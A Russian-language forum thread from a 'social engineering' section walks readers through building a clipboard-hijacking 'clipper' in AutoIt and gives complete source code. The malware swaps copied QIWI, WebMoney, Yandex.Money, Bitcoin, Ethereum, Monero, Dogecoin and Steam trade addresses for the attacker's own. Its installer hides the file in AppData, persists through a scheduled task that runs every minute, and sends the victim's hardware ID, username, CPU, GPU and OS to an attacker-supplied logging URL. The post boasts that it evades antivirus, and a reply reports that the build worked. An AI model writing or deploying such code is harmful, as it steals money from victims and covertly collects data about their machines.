Создаём свой клиппер

Тема в разделе "Социальная инженерия", создана пользователем zheki444, 06.05.2018.

Загрузка...
Ответов: 2 Просмотров: 572 Ответить в теме
  1. zheki444
    Всем привет!
    Пишу в столь поздний час так как у меня есть годнота для вас!

    Сейчас я научу вас делать свой клипер на auto it


    И так приступаем

    Нам понадобится!:
    1.AutoIt
    2.Прямые руки!

    Преимущества данного клиппера:
    Преимущества данного клипера :
    1)Отстук в IPlogger ( Расширенная версия)
    2) FUD , погрешность 0-2
    3) Автозапуск каждую минуту

    После того как вы скачали Auto it создаём скрипт
    [​IMG]
    Далее по созданному файлу жмем ПКМ и " Edit Script"
    [​IMG]

    Далее ставим #NoTrayIcon и включаем в скрипт <Misc.au3> ( #include <Misc.au3>)

    [​IMG]


    Теперь мы должны объявить переменные ( на примере покажу фрукт киви)

    [​IMG]

    Теперь, чтобы клипер не включался 100 раз , включаем в него функцию _Singleton ( Далее пригодится). Для этого нам нужно добавить в скрипт строку

    If _Singleton("QaAaovs1XHwTHpeg", 1) Then

    [​IMG]

    Далее получаем значение из буфера обмена , для этого создаем переменную

    Local $sData = ClipGet()

    получающую значение из буфера обмена .
    Так как мы знаем , что фрукт киви не имеет пробела, двоеточия, И.Т.Д . Добавляем проверку на эти символы, если их нету , то это фрукт киви. Еще мы знаем что фрукт киви начинается с "79" (или 8 или +7, но будут другие значения длины) имеет длину строки равную 11 . добавляем проверку на длину и начало строки, если все соответствует , то это фрукт киви и надо поменять буфер обмена на наше значение
    • Local $sData = ClipGet()
    • If Not StringInStr($sData, "a") And Not StringInStr($sData, " ") And Not StringInStr($sData, ":") And Not StringInStr($sData, "/") And Not StringInStr($sData, "+")Then ; Проверка если нету этих символов , то это фрукт киви, если они присутствуют , то это не фрукт киви
    If StringLeft($sData, 2) = "79" And StringLen($sData) = 11 Then ; Проверка , если начинается с 79 и длина строки 11 ,то это фрукт киви.
    ClipPut($фрукт киви) ; Значение для подмены буфера

    [​IMG]

    Теперь закрываем If

    [​IMG]

    If _Singleton("QaAaovs1XHwTHpeg", 1) Then
    While 1
    Local $sData = ClipGet()
    If Not StringInStr($sData, "a") And Not StringInStr($sData, " ") And Not StringInStr($sData, ":") And Not StringInStr($sData, "/") And Not StringInStr($sData, "+") Then
    If StringLeft($sData, 2) = "79" And StringLen($sData) = 11 Then
    ClipPut($фрукт киви)
    EndIf
    EndIf
    Sleep ( 150)
    WEnd
    EndIf

    Теперь компилируем его сочетанием клавиш CTRL+F7
    Ставим значения как на скриншотах:
    [​IMG]

    2)
    [​IMG]

    Теперь жмем " Compile Script "
    [​IMG]
    Основной код закончен , теперь делаем инсталлер, который будет запускать клипер каждую минуту , отстук в IPlogger и сделает клипер скрытым .

    В папке должен появиться файл windrws.exe
    Теперь создаем еще один скрипт ( как в самом начале)
    Добавляем туда #NoTaryIcon

    Теперь скрипт должен создать папку WindowsHost в AppData, для этого пишем код :
    If Not FileExists (@AppDataDir & "\WindowsHost") Then
    DirCreate (@AppDataDir & "\WindowsHost")
    EndIf

    [​IMG]

    Теперь добавляем код , который " Втянет " в себя наш клипер и распакует его в созданную папку

    FileInstall ("Путь до клипера\windrws.exe", @AppDataDir & "\WindowsHost\windrws.exe")

    Пример : FileInstall ("C:\1\windrws.exe", @AppDataDir & "\WindowsHost\windrws.exe")


    [​IMG]

    Теперь создаем автозапуск клипера , для этого добавим код , который добавит задание в планировщик задач
    Run(@ComSpec & " /c " & "schtasks /create /tn ""StartUp Windows"" /tr %appdata%\WindowsHost\windrws.exe /sc minute /mo 1","", @SW_HIDE)
    [​IMG]

    Далее нам нужно скрыть папку и сам клипер от глаз , для этого добавим код:
    FileSetAttrib (@AppDataDir & "\WindowsHost\windrws.exe", "+SHR")
    FileSetAttrib (@AppDataDir & "\WindowsHost", "+SHR")
    [​IMG]
    Теперь добавим IPlogger
    Для этого отправим HTTP запрос ,с подменой User-agent
    Вот готовый код с отправкой : HWID . CPU.GPU .USERNAME . OS .
    #Include <APIConstants.au3>
    #Include <WinAPIEx.au3>
    Global Const $wbemFlagReturnImmediately = 0x10
    Global Const $wbemFlagReturnWhenComplete = 0x0
    Global Const $wbemFlagBidirectional = 0x0
    Global Const $wbemFlagForwardOnly = 0x20
    Global Const $wbemFlagNoErrorObject = 0x40
    Global Const $wbemFlagReturnErrorObject = 0x0
    Global Const $wbemFlagSendStatus = 0x80
    Global Const $wbemFlagDontSendStatus = 0x0
    Global Const $wbemFlagUseAmendedQualifiers = 0x20000
    Local $sign = @OSVersion
    $ID = _WinAPI_UniqueHardwareID(BitOR($UHID_MB, $UHID_BIOS, $UHID_CPU))
    $sw=RegRead("HKEY_LOCAL_MACHINE\HARDWARE\\DESCRIPTION\System\CentralProcessor\0","ProcessorNameString")
    $ss1= @username
    Local $sign1 = @CPUArch
    Local $sign2 = @ComputerName
    Local $oHTTP = ObjCreate('WinHttp.WinHttpRequest.5.1')
    $oHTTP.Open("Post", "ВАША_ССЫЛКА_", False)
    $oHTTP.SetRequestHeader('User-Agent',"OS:"&$sign&" "&$sign1&","&" "&"CPU:"&$sw&","&" "&"HWID:"&$ID&","&" "&"UserName:"&$ss1&","&" "&"GPU:"&_VideoControllerGetName())
    $oHTTP.Send
    Func _VideoControllerGetName()
    Local $oWMI = ObjGet("winmgmts:\\.\root\CIMV2")
    If Not IsObj($oWMI) Then Return SetError(1, 0, 0)
    Local $oItems = $oWMI.ExecQuery("SELECT * FROM Win32_VideoController", "WQL", BitOR($wbemFlagReturnImmediately, $wbemFlagForwardOnly)), $sOut
    If Not IsObj($oItems) Then Return SetError(2, 0, 0)
    For $oIt In $oItems
    $sOut &= $oIt.Name & @LF
    Next
    StringTrimRight($sOut, 1)
    Return SetError(0, 0, $sOut)
    EndFunc ;==>_VideoControllerGetName
    Приделываем его к нашему инсталлеру и меняем ссылку на сбор IP адресов в IPlogger`e
    P.S. Приделываем , это значит добавляем его к основному коду , Вот так:

    [​IMG]

    Вот эту ссылку копируем !

    [​IMG]

    И последний шаг , нужно чтобы код запустил наш клипер :
    Run (@AppDataDir & "\WindowsHost\windrws.exe" ,"",@SW_HIDE)
    и Завершил скрипт командой :
    Exit
    [​IMG]

    вот фулл готовый код инсталятора : [​IMG]

    Вот и все , теперь снова компилируем , точно так-же как и на прошлых скринах компиляции(название и все остальное меняйте, только обязательно ставьте AsInvoker) , можете вставить иконку и прикрутить описание .

    Там вставьте ваши кошельки в переменные , скомпилируйте , и добавьте в инсталлер.
    В этом коде подмена идет на : фрукт киви , Webmoney (WMU.WME.WMR) , BTC, YANDEX.MONEY , ETH, STEAM TRADE OFFER LINK , DodgeCoin , XMR
    #NoTrayIcon
    If Not FileExists (@AppDataDir & "\WindowsHost") Then
    DirCreate (@AppDataDir & "\WindowsHost")
    EndIf
    FileInstall ("C:\1\windrws.exe", @AppDataDir & "\WindowsHost\windrws.exe")
    Run(@ComSpec & " /c " & "schtasks /create /tn ""StartUp Windows"" /tr %appdata%\WindowsHost\windrws.exe /sc minute /mo 1","", @SW_HIDE)
    FileSetAttrib (@AppDataDir & "\WindowsHost\windrws.exe", "+SHR")
    FileSetAttrib (@AppDataDir & "\WindowsHost", "+SHR")
    #Include <APIConstants.au3>
    #Include <WinAPIEx.au3>
    Global Const $wbemFlagReturnImmediately = 0x10
    Global Const $wbemFlagReturnWhenComplete = 0x0
    Global Const $wbemFlagBidirectional = 0x0
    Global Const $wbemFlagForwardOnly = 0x20
    Global Const $wbemFlagNoErrorObject = 0x40
    Global Const $wbemFlagReturnErrorObject = 0x0
    Global Const $wbemFlagSendStatus = 0x80
    Global Const $wbemFlagDontSendStatus = 0x0
    Global Const $wbemFlagUseAmendedQualifiers = 0x20000
    Local $sign = @OSVersion
    $ID = _WinAPI_UniqueHardwareID(BitOR($UHID_MB, $UHID_BIOS, $UHID_CPU))
    $sw=RegRead("HKEY_LOCAL_MACHINE\HARDWARE\\DESCRIPTION\System\CentralProcessor\0","ProcessorNameString")
    $ss1= @username
    Local $sign1 = @CPUArch
    Local $sign2 = @ComputerName
    Local $oHTTP = ObjCreate('WinHttp.WinHttpRequest.5.1')
    $oHTTP.Open("Post", "Тут_Ваша_Сслка", False)
    $oHTTP.SetRequestHeader('User-Agent',"OS:"&$sign&" "&$sign1&","&" "&"CPU:"&$sw&","&" "&"HWID:"&$ID&","&" "&"UserName:"&$ss1&","&" "&"GPU:"&_VideoControllerGetName())
    $oHTTP.Send
    Func _VideoControllerGetName()
    Local $oWMI = ObjGet("winmgmts:\\.\root\CIMV2")
    If Not IsObj($oWMI) Then Return SetError(1, 0, 0)
    Local $oItems = $oWMI.ExecQuery("SELECT * FROM Win32_VideoController", "WQL", BitOR($wbemFlagReturnImmediately, $wbemFlagForwardOnly)), $sOut
    If Not IsObj($oItems) Then Return SetError(2, 0, 0)
    For $oIt In $oItems
    $sOut &= $oIt.Name & @LF
    Next
    StringTrimRight($sOut, 1)
    Return SetError(0, 0, $sOut)
    EndFunc ;==>_VideoControllerGetName
    Run (@AppDataDir & "\WindowsHost\windrws.exe" ,"",@SW_HIDE)
    Exit;
    #NoTrayIcon
    #include <Misc.au3>
    ; By SilowHD
    ; (смешной-форум-школьников).net - top forum
    Local $фрукт киви = "7**********" ; фрукт киви
    Local $qiwi2 = "8**********" ; фрукт киви
    Local $qiwi1 = "+7**********" ; фрукт киви
    Local $wmr = "R****************" ; WEBMONEY (WMR)
    Local $BTC = "**********************************************" ; BITCOIN
    Local $yadengi = "4100*************" ; YANDEX MONEY
    Local $wme = "E************" ; WEBMONEY (WME)
    Local $steam = "https://steamcommunity.com/tradeoffer/new/?partner=*****************" ; STEAM TRADE OFFER LINK
    Local $dodge = "*******************************" ; ДОДЖЕ КОИН
    Local $ETH = "0x***************************************" ; ЭФИРИУМ
    Local $wmu = "U*********************" ; WEBMONEY (WMU)
    Local $XMR = "*********************************************************" ; XMR
    If _Singleton("QaAaovs1XHwTHpeg", 1) Then
    While 1
    Local $sData = ClipGet()
    If Not StringInStr($sData, "a") And Not StringInStr($sData, " ") And Not StringInStr($sData, ":") And Not StringInStr($sData, "/") And Not StringInStr($sData, "+") Then
    If StringLeft($sData, 2) = "79" And StringLen($sData) = 11 Then
    ClipPut($фрукт киви)
    EndIf
    EndIf
    Sleep ( 150)
    Local $sData = ClipGet()
    If Not StringInStr($sData, "a") And Not StringInStr($sData, " ") And Not StringInStr($sData, ":") And Not StringInStr($sData, "/") Then
    If StringLeft($sData, 3) = "+79" And StringLen($sData) = 12 Then
    ClipPut($qiwi1)
    EndIf
    EndIf
    Local $sData = ClipGet()
    If Not StringInStr($sData, "a") And Not StringInStr($sData, " ") And Not StringInStr($sData, ":") And Not StringInStr($sData, "/") And Not StringInStr($sData, "+") Then
    If StringLeft($sData, 1) = "R" And StringLen($sData) = 13 Then
    ClipPut($wmr)
    EndIf
    EndIf
    Local $sData = ClipGet()
    If Not StringInStr($sData, "a") And Not StringInStr($sData, " ") And Not StringInStr($sData, ":") And Not StringInStr($sData, "/") And Not StringInStr($sData, "+") Then
    If StringLeft($sData, 1) = "E" And StringLen($sData) = 13 Then
    ClipPut($wme)
    EndIf
    EndIf
    Local $sData = ClipGet()
    If Not StringInStr($sData, "a") And Not StringInStr($sData, " ") And Not StringInStr($sData, ":") And Not StringInStr($sData, "/") And Not StringInStr($sData, "+") Then
    If StringLeft($sData, 1) = "U" And StringLen($sData) = 13 Then
    ClipPut($wmu)
    EndIf
    EndIf
    Local $sData = ClipGet()
    If Not StringInStr($sData, "a") And Not StringInStr($sData, " ") And Not StringInStr($sData, ":") And Not StringInStr($sData, "/") And Not StringInStr($sData, "+") Then
    If StringLeft($sData, 4) = "4100" And StringLen($sData)= 15 Then
    ClipPut($yadengi)
    EndIf
    EndIf
    Local $sData = ClipGet()
    If Not StringInStr($sData, "a") And Not StringInStr($sData, " ") And not StringInStr($sData, "79") And Not StringInStr($sData, ":") And Not StringInStr($sData, "/") And Not StringInStr($sData, "+") Then
    If StringLeft($sData, 2)= "89" And StringLen($sData) = 11 Then
    ClipPut($qiwi2)
    EndIf
    EndIf
    local $sData = ClipGet()
    If Not StringInStr($sData, " ") And Not StringInStr($sData, " ") And Not StringInStr($sData, " ") And Not StringInStr($sData, " ") And Not StringInStr($sData, " ") Then
    If StringLeft($sData, 1) = "D" and StringLen($sData) = 34 Then
    ClipPut($dodge)
    EndIf
    EndIf
    Local $sData = ClipGet()
    If Not StringInStr($sData, " ") Then
    If StringLeft($sData, 2) = "0x" and StringLen($sData) > 27 Then
    ClipPut($ETH)
    EndIf
    EndIf
    Local $sData = ClipGet()
    If Not StringInStr($sData, " ") And Not StringInStr($sData, " ") And Not StringInStr($sData, "0") And Not StringInStr($sData, "I") And Not StringInStr($sData, "l") Then
    If StringLeft($sData, 1) = "1" and StringLen($sData) = 33 or StringLen($sData) = 34 Then
    ClipPut($BTC)
    EndIf
    EndIf
    Local $sData = ClipGet()
    If Not StringInStr($sData, "+") Then
    If StringInStr($sData, "https://steamcommunity.com/tradeoffer/new/?partner=") Then
    ClipPut($steam)
    EndIf
    EndIf
    Local $sData = ClipGet()
    If Not StringInStr($sData, " ") And Not StringInStr($sData, "+") And Not StringInStr($sData, "_") And Not StringInStr($sData, "-") And Not StringInStr($sData, "/") Then
    If StringLeft($sData, 1) = "4" and StringLen($sData) = 95 or StringLen($sData) = 106 Then
    ClipPut($XMR)
    EndIf
    EndIf
    Sleep (150)
    WEnd
    EndIfДетект инсталера - [ 1-39]
    Детект клипера - [0-39]

    Автор кода SilowHD @SilowHD

    [Схема (top) (без аналогов)] [тык]
     
    06.05.2018 Сообщений: 260 Симпатий: 74
  2. STF
    STF
    Нам понадобится!:

    2.Прямые руки!

    все я отлетел)
     
    01.07.2018 Сообщений: 734 Симпатий: 562
  3. lololomka220
    Cпасибо всё*dep* получилось
     
    07.01.2019 Сообщений: 8 Симпатий: 0
В этой теме всего одна страница
Вам, как гостю, ограничены возможности взаимодействия с темами. Пройдите бесплатную регистрацию и откройте для себя море возможностей.